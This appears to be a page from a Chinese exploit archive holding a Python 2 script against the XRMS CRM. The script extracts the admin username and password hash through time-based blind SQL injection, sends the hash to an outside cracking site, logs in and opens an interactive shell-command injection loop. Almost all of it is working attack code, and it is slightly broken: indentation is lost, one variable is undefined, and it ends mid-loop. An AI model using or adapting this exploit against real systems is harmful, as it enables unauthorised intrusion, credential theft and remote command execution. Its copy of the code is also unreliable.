XRMS - Blind SQL Injection and Command Execution

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

XRMS - Blind SQL Injection and Command Execution

来源：vfocus.net 作者：Harris 发布时间：2014-08-29

#######################

# XRMS Blind SQLi via $_SESSION poisoning, then command exec

#########################

import urllib

import urllib2

import time

import sys

usercharac = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','@','.','_','-','1','2','3','4','5','6','7','8','9','0']

userascii = [97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 64, 46, 95, 45, 49, 50, 51, 52, 53, 54, 55, 56, 57, 48]

def banner():

print """ ____

/ __/_ ______ _ _ ___________ ___ _____

/ /_/ / / / __ `/ | |/_/ ___/ __ `__ \/ ___/

/ __/ /_/ / /_/ / _> </ / / / / / / (__ )

/_/ \__,_/\__, (_)_/|_/_/ /_/ /_/ /_/____/

/_/

[+] fuq th3 w0rld, fuq ur m0m!\n"""

def usage():

print " [+] Info: Remote Command Execution via $_SESSION poisoning to SQLi to RCE"

print " [+] Example:"

print " [+] python " + sys.argv[0] + " domain.to/xrms"

quit()

def sendhashaway(hash):

print " [+] Sending hash to icrackhash.com to be cracked."

data = None

headers = { 'Referer' : 'http://icrackhash.com/?mdhash=' + hash + '&type=MD5','User-Agent' : 'Mozilla','X-Requested-With' : 'XMLHttpRequest'}

url = 'http://www.icrackhash.com/?mdhash=' + hash + '&type=MD5'

gh = urllib2.Request(url,data,headers)

gh2 = urllib2.urlopen(gh)

output = gh2.read()

plaintext = getpositions(output,'<td><small><strong>','</strong>')

print " [-] Plaintext of hash: " +plaintext + "\n"

return plaintext

def username(length):

length = length + 1

duser = []

#1) UNION ALL SELECT 1,2,3,4,5,6,7,8,9-- -

found = 0

i = 1

payload1 = "1) UNION ALL SELECT 1,2,3,4,5,6,7,8,IF(SUBSTRING(username,"

payload2 = ",1)=CHAR("

payload3 = "),BENCHMARK(5000000,MD5(0x34343434)),NULL) FROM users-- -"

for i in range(1,length):

found = 0

while(found != 1):

for f in range(0,len(userascii)):

class LeHTTPRedirectHandler(urllib2.HTTPRedirectHandler):

def http_error_302(self, req, fp, code, msg, headers):

infourl = urllib2.addinfourl(fp, headers, req.get_full_url())

infourl.status = code

infourl.code = code

return infourl

http_error_300 = http_error_302

class HeadRequest(urllib2.Request):

def get_method(self):

return "POST"

payload = payload1 + str(i) + payload2 + str(userascii[f]) + payload3

data = urllib.urlencode([('user_id',payload)])

url = 'http://'+domain+'/plugins/webform/new-form.php'

opener = urllib2.build_opener(LeHTTPRedirectHandler)

req = HeadRequest(url,data)

prepare = opener.open(req)

cookie1 = prepare.info()

cookie2pos1 = str(cookie1).find('PHPSESSID')

cookie2pos2 = str(cookie1).find("\n",cookie2pos1)

line = str(cookie1)[cookie2pos1:cookie2pos2 - 9]

line = 'XRMS' + line[9:]

url = 'http://'+domain+'/plugins/useradmin/fingeruser.php'

headers = { 'Cookie' : line }

data = None

start = time.time()

get = urllib2.Request(url,data,headers)

get.get_method = lambda: 'HEAD'

try:

execute = urllib2.urlopen(get)

except:

pass

elapsed = (time.time() - start)

if(elapsed > 1):

print " Character found. Character is: " + usercharac[f]

duser.append(usercharac[f])

found = 1

return duser

def getusernamelength():

found = 0

i = 1

payload1 = "1) UNION ALL SELECT 1,2,3,4,5,6,7,8,IF(LENGTH(username) = '"

payload2 = "',BENCHMARK(50000000,MD5(0x34343434)),NULL) FROM users-- -"

while (found != 1):

class LeHTTPRedirectHandler(urllib2.HTTPRedirectHandler):

def http_error_302(self, req, fp, code, msg, headers):

infourl = urllib2.addinfourl(fp, headers, req.get_full_url())

infourl.status = code

infourl.code = code

return infourl

http_error_300 = http_error_302

class HeadRequest(urllib2.Request):

def get_method(self):

return "POST"

payload = payload1 + str(i) + payload2

data = urllib.urlencode([('user_id',payload)])

url = 'http://'+domain+'/plugins/webform/new-form.php'

opener = urllib2.build_opener(LeHTTPRedirectHandler)

req = HeadRequest(url,data)

prepare = opener.open(req)

cookie1 = prepare.info()

cookie2pos1 = str(cookie1).find('PHPSESSID')

cookie2pos2 = str(cookie1).find("\n",cookie2pos1)

line = str(cookie1)[cookie2pos1:cookie2pos2 - 9]

line = 'XRMS' + line[9:]

url = 'http://'+domain+'/plugins/useradmin/fingeruser.php'

headers = { 'Cookie' : line }

data = None

start = time.time()

get = urllib2.Request(url,data,headers)

get.get_method = lambda: 'HEAD'

try:

execute = urllib2.urlopen(get)

except:

pass

elapsed = (time.time() - start)

if(elapsed > 1):

print " Length found at position: " + str(i)

found = 1

length = i

return length

i = i + 1

def password(length):

length = length + 1

dpassword = []

#1) UNION ALL SELECT 1,2,3,4,5,6,7,8,9-- -

found = 0

i = 1

payload1 = "1) UNION ALL SELECT 1,2,3,4,5,6,7,8,IF(SUBSTRING(password,"

payload2 = ",1)=CHAR("

payload3 = "),BENCHMARK(5000000,MD5(0x34343434)),NULL) FROM users-- -"

for i in range(1,length):

found = 0

while(found != 1):

for f in range(0,len(userascii)):

class LeHTTPRedirectHandler(urllib2.HTTPRedirectHandler):

def http_error_302(self, req, fp, code, msg, headers):

infourl = urllib2.addinfourl(fp, headers, req.get_full_url())

infourl.status = code

infourl.code = code

return infourl

http_error_300 = http_error_302

class HeadRequest(urllib2.Request):

def get_method(self):

return "POST"

payload = payload1 + str(i) + payload2 + str(userascii[f]) + payload3

data = urllib.urlencode([('user_id',payload)])

url = 'http://'+domain+'/plugins/webform/new-form.php'

opener = urllib2.build_opener(LeHTTPRedirectHandler)

req = HeadRequest(url,data)

prepare = opener.open(req)

cookie1 = prepare.info()

cookie2pos1 = str(cookie1).find('PHPSESSID')

cookie2pos2 = str(cookie1).find("\n",cookie2pos1)

line = str(cookie1)[cookie2pos1:cookie2pos2 - 9]

line = 'XRMS' + line[9:]

url = 'http://'+domain+'/plugins/useradmin/fingeruser.php'

headers = { 'Cookie' : line }

data = None

start = time.time()

get = urllib2.Request(url,data,headers)

get.get_method = lambda: 'HEAD'

try:

execute = urllib2.urlopen(get)

except:

pass

elapsed = (time.time() - start)

if(elapsed > 1):

print " Character found. Character is: " + usercharac[f]

dpassword.append(usercharac[f])

found = 1

return dpassword

def login(domain,user,password):

cookie = "XRMS=iseeurgettinown4d"

url = 'http://'+domain+'/login-2.php'

headers = { 'Cookie' : cookie }

data = urllib.urlencode([('username',user),('password',password)])

a1 = urllib2.Request(url,data,headers)

a2 = urllib2.urlopen(a1)

output = a2.read()

if output.find('PEAR.php') > 0:

print " [+] Logged In"

def commandexec(domain,command):

cookie = "XRMS=iseeurgettinown4d"

cmd = urllib.urlencode([("; echo '0x41';" + command + ";echo '14x0';",None)])

headers = { 'Cookie' : cookie }

data = None

url = 'http://'+domain+'/plugins/useradmin/fingeruser.php?username=' + cmd

b1 = urllib2.Request(url,data,headers)

b2 = urllib2.urlopen(a1)

output = b2.read()

first = output.find('0x41') + 4

last = output.find('14x0') - 4

return output[first:last]

banner()

if len(sys.argv) < 2:

usage()

domain = sys.argv[1]

print " [+] Grabbing username length"

length = getusernamelength()

print " [+] Grabbing username characters"

tmpuser = username(length)

adminusr = "".join(tmpuser)

print " [+] Grabbing password hash"

tmppass = password(32)

admpass = "".join(tmppass)

print " [+] Admin username: "+ adminusr

print " [+] Admin password hash: " + admpass

plain = sendhashaway(admpass)

login(domain,adminusr,plain)

while(quit != 1):

cmd = raw_input(' [+] Run a command: ')

if cmd == 'quit':

print " [-] Hope you had fun :)"

quit = 1

if cmd != 'quit':

[